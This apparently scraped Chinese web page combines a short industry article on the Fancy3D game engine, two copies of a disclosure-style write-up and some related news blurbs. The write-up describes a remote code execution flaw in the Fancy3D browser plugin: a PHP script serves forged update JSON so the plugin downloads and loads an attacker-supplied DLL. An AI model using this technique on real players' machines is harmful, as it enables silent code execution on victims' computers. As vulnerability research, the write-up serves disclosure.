今日有0款游戏测试：
本周款游戏开测(08.27-09.02)
当前位置： >
Fancy3D的产业链发展方式
和国外生长的COCOS和Unity3D不同，国内自主知识产权的Fancy3D有自己的发展路线，既不是Cocos的开源，也不是Unity3D留部分接口给开发者自行完善，Fancy3D是把现有所有功能封起来，模块化，如果开发者有额外的要求，将由Fancy3D的研发团队完成，或交由第三方的团队来完成，以此构成一个完整的生态链。这个引擎的拥有方&&青果灵动，希望通过这种他们认为更符合国情的发展方式，在游戏引擎业务上能够杀出重围。
面向中低水平开发者预留中间开发空间的发展方式
青果灵动CEO刘睿介绍，Fancy3D是从页游时代就已开始运营的引擎产品，目前在国内微端/网页3D游戏开发领域占有超过30%市场份额，公司通过Fancy3D自研的引擎研发的页游《》月流水最高破亿，去年7月开服数超过2000组，PCU超过13万。
青果灵动CEO刘睿
到2014年10月，Fancy3D引擎面向3D移动游戏开发者全面开放使用。
在转型过程中，青果灵动方面提出的是面向中低水平的开发者，通过Fancy3D降低3D产品的开发难度。降低开发难度主要通过2点，第一是通过硬件，产品和技术本身的优化，比如讲引擎中涉及到的功能模块化，&底层采用高性能的C/C++技术，前台支持Lua/JS等脚本语言，快速开发游戏&，实现一键发布等功能&&第二是软件上，可以由开发引擎本身的团队和使用引擎的开发团队对接，直接服务，开发者可以提出额外的开发要求，由青果灵动的团队来完成。以此来降低开发门槛，以及降低开发团队的人员成本。
技术和服务之外，刘睿也希望通过留出的空间，打造一个更完善的生态链，引入更多的开发者留在这个引擎平台上。也就是说，上述开发团队提出的一些开发要求，可以由第三方的团队来完成。据刘睿介绍，也的确已经有不少团队在提供相关的服务。
以游戏开发大赛培养团队
和所有引擎平台类似，青果灵动在2014年10月启动了开发者大赛。作为游戏行业的老人，刘睿的心态比较现实，表示做游戏大赛，并不期望找到特别完美的团队，有优势有短板的团队也可以，愿意通过长期的合作，锻炼这些团队，甚至不惜推出全免费的游戏来挑战市场。
游戏大赛的背后，还有创投基金创意云平台的参与。青果灵动希望牵头，带动产业链上的资源，来关注平台上的开发者。从研发上扶持的同时，也会通过天使/战略/风险投资等各种方式，并从渠道、支付等等方面，帮助开发者。
猎马计划&&寻找非主流黑马
在寻找团队，寻找产品的逻辑上，青果灵动将其概括成&猎马计划&，即猎黑马计划。
刘睿认为，目前市场上最主流的好产品肯定早早的就被行业大头抢走，而二三线的厂商们应该做的就是去发现非主流的黑马。按照这个逻辑，青果灵动确定了猎马计划的策略，去找到一般大家认为风险大，但是有市场空白，品质不错的项目。
上一篇： 下一篇：
小技巧：百度搜索“一游网”可找到本站
相关文章：
手机游戏推荐
热门游戏开服表
战斗方式－画面
Copyright &
All rights reserved
版权所有 鄂ICP备号-1Fancy3D游戏引擎远程代码执行漏洞
作者：红黑联盟 路人甲
分类 : 比特网
　　标题一定要性感，漏洞类型一定要叼，自评rank一定要高 这样才会有闪电
　　这几年页游越来越火，大有取代端游的趋势。从早期的文字游，到后来的js、flash、3D,游戏引擎日益成熟，捞钱手段越发精明。辉煌的背后，问题却很少被人提起。
　　今天，路人甲就来丢个重磅炸弹。(没错我就是匿名 你找的到我么)
　　你玩XXX么？玩？哦 那你是我的肉鸡了
　　你玩XX么？不玩？那你玩过XXX么？半年前玩过1分钟？哦 那你也是我的肉鸡了
　　你玩XX么？不玩？XXX也不玩？你是开发者？哦 那你还是我的肉鸡
　　下面开始很严肃的详细说明。哦对 你们要3个月后才能看到 哈哈 怪我咯
　　北京青果灵动科技有限公司自主研发的3D网页游戏引擎Fancy3D。测试中发现有参数可任意控制 最终实现远程命令执行。以下是分析过程：
　　先来游戏加载页面 这里选了一款苏州争渡科技有限公司开发游戏 三国武神
　　为保持卷面整洁，代码有删减
　　游戏主页面：http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login?platform=xxxxxx
//加载后期配置
//Fancy3D插件启动脚本
　　this.logincode = (function(){
　　var box = 'no';
　　if(_self.platform == 'xunlei'){
　　try { window.external.GetClientInfo(); box = 'xunlei';} catch(e) { box = 'no'; }
　　return 'foaparam=lordcrab:\/\/sn=18服\x26sa=s18.37wan.sgws.ate.cn:3018\x26tl=\x26un=p37_18_xutianle2\x26cc=某个md5\x26nc=p37_18_xutianle2\x26dx=\x26ndx=\x26cv=test3\/\x26api=http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18\x26xcn=test\x26xcv=3&xdt=' + box + '# http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18 a 3 test 1';
　　}());//logincode生成 下面会说到
　　先看看http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18
　　1window.gameversion="1400301";window.TangRen_AutoPatch="http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip";window.fancydownurlx64="http://res.ly.sgws.g.1360.com/static/fancy/down64.dll";window.fancyentryurl="http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe";window.clientversion="1.0";window.versions="1400229";window.fancydownurlx86="http://res.ly.sgws.g.1360.com/static/fancy/down.dll";window.entrymd5="8cbed30a7a4c5b1ac428";window.mfc="http://res.ly.sgws.g.1360.com/updateot/mfc.zip";window.TangRenPluginSetUp="http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip";window.fancymd5x64="dd6ffd1aedc204efec3a722ec670f176";window.fancymd5x86="aa401a6cb0f54576eba479";window.version="1.0";
　　这里面定义了一些初始化的配置 方便解说下面称这段配置为“配置一”
　　然后来看启动插件的部分logic1.2.js
　　32....以上省略....
　　//-------------------------------------------
　　//启动青果插件
　　function load_fancy_html_obj(){
　　var attr = _E.browser == 'ie'?'classid="clsid:b2e8d85e-c0c5-48df-8dbc-"' : 'type="application/fancy-npruntime-fancy3d-plugin"';
　　var liburl = window.fancydownurlx86;
　　var libmd5 = window.fancymd5x86;
　　if(_E.browser == 'ie' && _E.platform == 'x64'){
　　liburl = window.fancydownurlx64;
　　libmd5 = window.fancymd5x64;
　　var tr_pick_url= 'http://'+_G.pickurl+'/pick/multiinfo',
　　tr_createTokenUrl = 'http://'+_G.apiHost+'/createtoken?token=' + _G.tr_token,
　　tr_createTokenKey = 'none',
　　tr_createTokenName = 'none';
　　var param1 = _G.username + ' ' + tr_pick_url + ' ' + tr_createTokenUrl + ' ' + tr_createTokenKey + ' '+ tr_createTokenName + ' ' + _G.
　　var html = '
　　$("#fancy3d_divbox").html(html);
　　....以下省略....
　　其中的重要变量(意思是如果这个变量有问题，插件就不会启动或者无法执行下去)有
　　attr 根据选择插件加载方式
　　liburl 插件启动后首先下载的文件 来自配置一的window.fancydownurlx86
　　libmd5 顾名思义 上面一个文件的MD5 来自配置一的window.fancymd5x86
　　exeurl 游戏主程序的地址 来自配置一window.fancyentryurl
　　exemd5 游戏主程序md5 来自配置一的window.entrymd5
　　param1 普通参数传递 这里面比较重要的是_G.logincode 来源在上面
　　下面说说观察到的流程：
　　1、点开网页后，首先加载fancy3d插件
　　2、插件启动后，在C:\Users\用户\fancy\下创建目录ZDSGGame
　　3、插件下载liburl(down.dll)并加载
　　4、插件下载游戏主程序SangoWebEntry.exe并启动
　　5、SangoWebEntry.exe请求logincode中的api获取版本号
　　6、SangoWebEntry.exe请求http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18(来源logincode) 内容如下:
　　1{"gameversion": "1400301", "TangRen_AutoPatch": "http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip", "fancydownurlx64": "http://res.ly.sgws.g.1360.com/static/fancy/down64.dll", "fancyentryurl": "http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe", "clientversion": "1.0", "versions": "1400229", "fancydownurlx86": "http://res.ly.sgws.g.1360.com/static/fancy/down.dll", "entrymd5": "8cbed30a7a4c5b1ac428", "mfc": "http://res.ly.sgws.g.1360.com/updateot/mfc.zip", "TangRenPluginSetUp": "http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip", "fancymd5x64": "dd6ffd1aedc204efec3a722ec670f176", "fancymd5x86": "aa401a6cb0f54576eba479", "version": "1.0"}
　　7、SangoWebEntry.exe从上一步请求结果中取出TangRen_AutoPatch地址并下载解压到client目录
　　8、SangoWebEntry.exe从client目录解压TangRen-AutoPatch5.18.zip并载入TangRen-AutoPatch.dll开始自动更新
　　9、自动更新完毕 进入游戏
　　从以上流程可以看到 如果3 4 6 这几步的内容可被任意控制 那就可以下载并执行任意的exe或者dll了
　　实际测试发现3(liburl) 4(exeurl)这两个参数只要一改 插件就不运行，应该是做了检查了
　　第6步的下载地址来自http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18
　　http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18来自logincode
　　logincode可控 而且按照格式修改的话 插件可以正确读取加载 于是搭建测试环境如下
　　首先写一个TangRen-AutoPatch.dll 如图
　　poc而已 求不吐槽
　　然后打包成TangRen-AutoPatch5.18.zip放到web目录下
　　然后新建一个php文件
　　5if($_GET['type'] == 'gameversion'){ //流程第5步请求的api 图方便我也改成这里了
　　die('1400301');
　　}else{
　　echo '{"gameversion": "1400303", "TangRen_AutoPatch": "http://localhost/updateot/TangRen-AutoPatch5.18.zip", "fancydownurlx64": "http://localhost/static/fancy/down64.dll", "fancyentryurl": "http://localhost/static/fancy/SangoWebEntry.exe", "clientversion": "1.1", "versions": "1400303", "fancydownurlx86": "http://localhost/static/fancy/down.dll", "entrymd5": "9cbed30a7a4c5b1ac428", "mfc": "http://localhost/updateot/mfc.zip", "TangRenPluginSetUp": "http://localhost/TangRenPluginSetUp1.4.zip", "fancymd5x64": "dd6efd1aedc204efec3a722ec670f176", "fancymd5x86": "ba401a6cb0f54576eba479", "version": "1.0"}';
　　其中最主要的是这段
　　1"TangRen_AutoPatch": "http://localhost/TangRen-AutoPatch5.18.zip"
　　然后修改一下游戏主页面 浏览器打开，然后什么都没有发生。。。
　　继续查看插件log发现TangRen_AutoPatch只会在游戏第一次安装的时候被下载和执行(或者版本更新？这里没研究下去)
　　需要游戏第一次加载 我们就再来看看游戏第一次加载的流程 其中第二步
　　2、插件启动后，在C:\Users\用户\fancy\下创建目录ZDSGGame
　　这个ZDSGGame是不是很眼熟 在游戏加载插件的时候 有个game参数的值就是这个
　　2var html = '
　　抱着试试看的态度 把这里的ZDSGGame改成了ZDSGGame1，重新用浏览器打开，等了大概5秒 刷的一下就弹出了熟悉的计算器
　　查看C:\Users\用户\fancy\ 果然生成了ZDSGGame1目录
　　后记：
　　市面上好多热门游戏包括暗黑之光 佛本是道 等等等等都在用这款插件 虽然具体流程略有不同，但是他们是共享的同一个网页插件
　　classid:b2e8d85e-c0c5-48df-8dbc-
　　所以只要玩过任何一款这个插件的游戏，就可以被攻击，当然也包括安装了这个插件的开发者，标题不算夸大吧。
　　由于插件是跨浏览器的，所以测试firefox ie 360浏览器极速模式(兼容模式)成功运行
　　解决：
　　检查做全套，细节最重要。
[ 责任编辑：小石潭记 ]
比特网 14:37:24
互联网+升级到智能+,开启万物智联新时代
中国互联网消费市场,发展潜力一片大好
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。当前位置： >
如何拿下几十万热门页游玩家的电脑（Fancy3D游戏引擎远程代码执
时间： 12:27 来源：未知 作者：www.secye.com 阅读：次
标题一定要性感，漏洞类型一定要叼，自评rank一定要高 这样才会有闪电
这几年页游越来越火，大有取代端游的趋势。从早期的文字游戏，到后来的js、flash、3D,游戏引擎日益成熟，捞钱手段越发精明。辉煌的背后，安全问题却很少被人提起。
今天，路人甲就来丢个重磅炸弹。(没错我就是匿名 你找的到我么)
你玩XXX么?玩?哦 那你是我的肉鸡了
你玩XX么?不玩?那你玩过XXX么?半年前玩过1分钟?哦 那你也是我的肉鸡了
你玩XX么?不玩?XXX也不玩?你是开发者?哦 那你还是我的肉鸡
下面开始很严肃的详细说明。哦对 你们要3个月后才能看到 哈哈 怪我咯
北京青果灵动科技有限公司自主研发的3D网页游戏引擎Fancy3D。测试中发现有参数可任意控制 最终实现远程命令执行。以下是分析过程：
先来看看游戏加载页面 这里选了一款苏州争渡科技有限公司开发游戏 三国武神
为保持卷面整洁，代码有删减
游戏主页面：http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login?platform=xxxxxx
//加载后期配置
//Fancy3D插件启动脚本
this.logincode = (function(){
var box = 'no';
if(_self.platform == 'xunlei'){
try { window.external.GetClientInfo(); box = 'xunlei';} catch(e) { box = 'no'; }
return 'foaparam=lordcrab:\/\/sn=18服\x26sa=s18.37wan.sgws.ate.cn:3018\x26tl=\x26un=p37_18_xutianle2\x26cc=某个md5\x26nc=p37_18_xutianle2\x26dx=\x26ndx=\x26cv=test3\/\x26api=http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18\x26xcn=test\x26xcv=3&xdt=' + box + '# http:\/\/s18.37wan.sgws.ate.cn\/proxy\/getv\/x52\/18 a 3 test 1';
}());//logincode生成 下面会说到
先看看http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18
window.gameversion=&1400301&;window.TangRen_AutoPatch=&http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip&;window.fancydownurlx64=&http://res.ly.sgws.g.1360.com/static/fancy/down64.dll&;window.fancyentryurl=&http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe&;window.clientversion=&1.0&;window.versions=&1400229&;window.fancydownurlx86=&http://res.ly.sgws.g.1360.com/static/fancy/down.dll&;window.entrymd5=&8cbed30a7a4c5b1ac428&;window.mfc=&http://res.ly.sgws.g.1360.com/updateot/mfc.zip&;window.TangRenPluginSetUp=&http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip&;window.fancymd5x64=&dd6ffd1aedc204efec3a722ec670f176&;window.fancymd5x86=&aa401a6cb0f54576eba479&;window.version=&1.0&;
这里面定义了一些初始化的配置 方便解说下面称这段配置为&配置一&
然后来看启动插件的部分logic1.2.js
....以上省略....
//-------------------------------------------
//启动青果插件
function load_fancy_html_obj(){
var attr = _E.browser == 'ie'?'classid=&clsid:b2e8d85e-c0c5-48df-8dbc-&' : 'type=&application/fancy-npruntime-fancy3d-plugin&';
var liburl = window.fancydownurlx86;
var libmd5 = window.fancymd5x86;
if(_E.browser == 'ie' && _E.platform == 'x64'){
liburl = window.fancydownurlx64;
libmd5 = window.fancymd5x64;
var tr_pick_url= 'http://'+_G.pickurl+'/pick/multiinfo',
tr_createTokenUrl = 'http://'+_G.apiHost+'/createtoken?token=' + _G.tr_token,
tr_createTokenKey = 'none',
tr_createTokenName = 'none';
var param1 = _G.username + ' ' + tr_pick_url + ' ' + tr_createTokenUrl + ' ' + tr_createTokenKey + ' '+ tr_createTokenName + ' ' + _G.
var html = '
$(&#fancy3d_divbox&).html(html);
....以下省略....
其中的重要变量(意思是如果这个变量有问题，插件就不会启动或者无法执行下去)有
attr 根据浏览器选择插件加载方式
liburl 插件启动后首先下载的文件 来自配置一的window.fancydownurlx86
libmd5 顾名思义 上面一个文件的MD5 来自配置一的window.fancymd5x86
exeurl 游戏主程序的地址 来自配置一window.fancyentryurl
exemd5 游戏主程序md5 来自配置一的window.entrymd5
param1 普通参数传递 这里面比较重要的是_G.logincode 来源在上面
下面说说观察到的流程：
1、点开网页后，首先加载fancy3d插件
2、插件启动后，在C:\Users\用户\fancy\下创建目录ZDSGGame
3、插件下载liburl(down.dll)并加载
4、插件下载游戏主程序SangoWebEntry.exe并启动
5、SangoWebEntry.exe请求logincode中的api获取版本号
6、SangoWebEntry.exe请求http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18(来源logincode) 内容如下:
{&gameversion&: &1400301&, &TangRen_AutoPatch&: &http://res.ly.sgws.g.1360.com/updateot/TangRen-AutoPatch5.18.zip&, &fancydownurlx64&: &http://res.ly.sgws.g.1360.com/static/fancy/down64.dll&, &fancyentryurl&: &http://res.ly.sgws.g.1360.com/static/fancy/SangoWebEntry.exe&, &clientversion&: &1.0&, &versions&: &1400229&, &fancydownurlx86&: &http://res.ly.sgws.g.1360.com/static/fancy/down.dll&, &entrymd5&: &8cbed30a7a4c5b1ac428&, &mfc&: &http://res.ly.sgws.g.1360.com/updateot/mfc.zip&, &TangRenPluginSetUp&: &http://res.ly.sgws.g.1360.com/updateot/TangRenPluginSetUp1.4.zip&, &fancymd5x64&: &dd6ffd1aedc204efec3a722ec670f176&, &fancymd5x86&: &aa401a6cb0f54576eba479&, &version&: &1.0&}
7、SangoWebEntry.exe从上一步请求结果中取出TangRen_AutoPatch地址并下载解压到client目录
8、SangoWebEntry.exe从client目录解压TangRen-AutoPatch5.18.zip并载入TangRen-AutoPatch.dll开始自动更新
9、自动更新完毕 进入游戏
从以上流程可以看到 如果3 4 6 这几步的内容可被任意控制 那就可以下载并执行任意的exe或者dll了
实际测试发现3(liburl) 4(exeurl)这两个参数只要一改域名 插件就不运行，应该是做了检查了
第6步的下载地址来自http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18
http://s18.37wan.sgws.ate.cn/proxy/getv/x52/18来自logincode
logincode可控 而且按照格式修改的话 插件可以正确读取加载 于是搭建测试环境如下
首先写一个TangRen-AutoPatch.dll 如图
poc而已 求不吐槽
然后打包成TangRen-AutoPatch5.18.zip放到web目录下
然后新建一个php文件
if($_GET['type'] == 'gameversion'){ //流程第5步请求的api 图方便我也改成这里了
die('1400301');
echo '{&gameversion&: &1400303&, &TangRen_AutoPatch&: &http://localhost/updateot/TangRen-AutoPatch5.18.zip&, &fancydownurlx64&: &http://localhost/static/fancy/down64.dll&, &fancyentryurl&: &http://localhost/static/fancy/SangoWebEntry.exe&, &clientversion&: &1.1&, &versions&: &1400303&, &fancydownurlx86&: &http://localhost/static/fancy/down.dll&, &entrymd5&: &9cbed30a7a4c5b1ac428&, &mfc&: &http://localhost/updateot/mfc.zip&, &TangRenPluginSetUp&: &http://localhost/TangRenPluginSetUp1.4.zip&, &fancymd5x64&: &dd6efd1aedc204efec3a722ec670f176&, &fancymd5x86&: &ba401a6cb0f54576eba479&, &version&: &1.0&}';
其中最主要的是这段
&TangRen_AutoPatch&: &http://localhost/TangRen-AutoPatch5.18.zip&
然后修改一下游戏主页面 浏览器打开，然后什么都没有发生。。。
继续查看插件log发现TangRen_AutoPatch只会在游戏第一次安装的时候被下载和执行(或者版本更新?这里没研究下去)
需要游戏第一次加载 我们就再来看看游戏第一次加载的流程 其中第二步
2、插件启动后，在C:\Users\用户\fancy\下创建目录ZDSGGame
这个ZDSGGame是不是很眼熟 在游戏加载插件的时候 有个game参数的值就是这个
var html = '
抱着试试看的态度 把这里的ZDSGGame改成了ZDSGGame1，重新用浏览器打开，等了大概5秒 刷的一下就弹出了熟悉的计算器
查看C:\Users\用户\fancy\ 果然生成了ZDSGGame1目录
市面上好多热门游戏包括暗黑之光 佛本是道 等等等等都在用这款插件 虽然具体流程略有不同，但是他们是共享的同一个网页插件
classid:b2e8d85e-c0c5-48df-8dbc-
所以只要玩过任何一款这个插件的游戏，就可以被攻击，当然也包括安装了这个插件的开发者，标题不算夸大吧。
由于插件是跨浏览器的，所以测试firefox ie 360浏览器极速模式(兼容模式)都可以成功运行
解决方案：
检查做全套，细节最重要。
本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)03-30 11:40 ]
评论 0 浏览 6175
在宣布收购研发商青果灵动97%股权并拿下跨平台游戏引擎Fancy3D后，猴年开年一路猛进的游族网络日前宣布推出由青果灵动研发的3D魔幻题材
ARPG手游《王者奇迹3D》。无论是游族网络与青果灵…
02-4 17:41 ]
评论 3 浏览 7857
速途网2月4日消息(报道 解佳昕)2月2日下午，首届Fancy
3D原创游戏开发大赛颁奖盛典在京举行，主办方青果灵动现场签约此次大赛的两大“黑马”团队，并将旗下品牌页游《黑暗之光》的手游版IP…
02-3 16:14 ]
评论 0 浏览 6538
经过一番激烈角逐，Fancy
3D开发者大会暨第一届Fancy3D原创游戏开发大赛所有奖项全部出炉，颁奖盛典也于2月2日在789剧场LiveHOUSE隆重举行。市场在变，产品和用户需求不断更迭…
02-2 12:30 ]
评论 0 浏览 4051
2月2日下午，中国领先的跨平台3D游戏研发企业青果灵动在798剧场LiveHouse举行了Fancy3D开发者大会暨第一届Fancy3D原创游戏开发大赛颁奖盛典。因此，创业者无需投入大笔的资金、无…
01-29 15:33 ]
评论 0 浏览 13182
日，国内领先的跨平台3D游戏研发商青果灵动，将于北京798艺术中心举办“Fancy3D中国开发者年会”。更多大会更多精彩内容，请关注“Fancy3D中国开发者年会”的后续报道。
10-16 23:50 ]
评论 0 浏览 13669
速途网10月16日消息(报道
解佳昕)今天下午，由青果灵动与创意云联合主办2014Fancy3D原创游戏开发大赛召开发布会，旨在发掘更多优秀的游戏开发团队及移动游戏作品。此外，青果灵动《黑暗之…
关键词搜索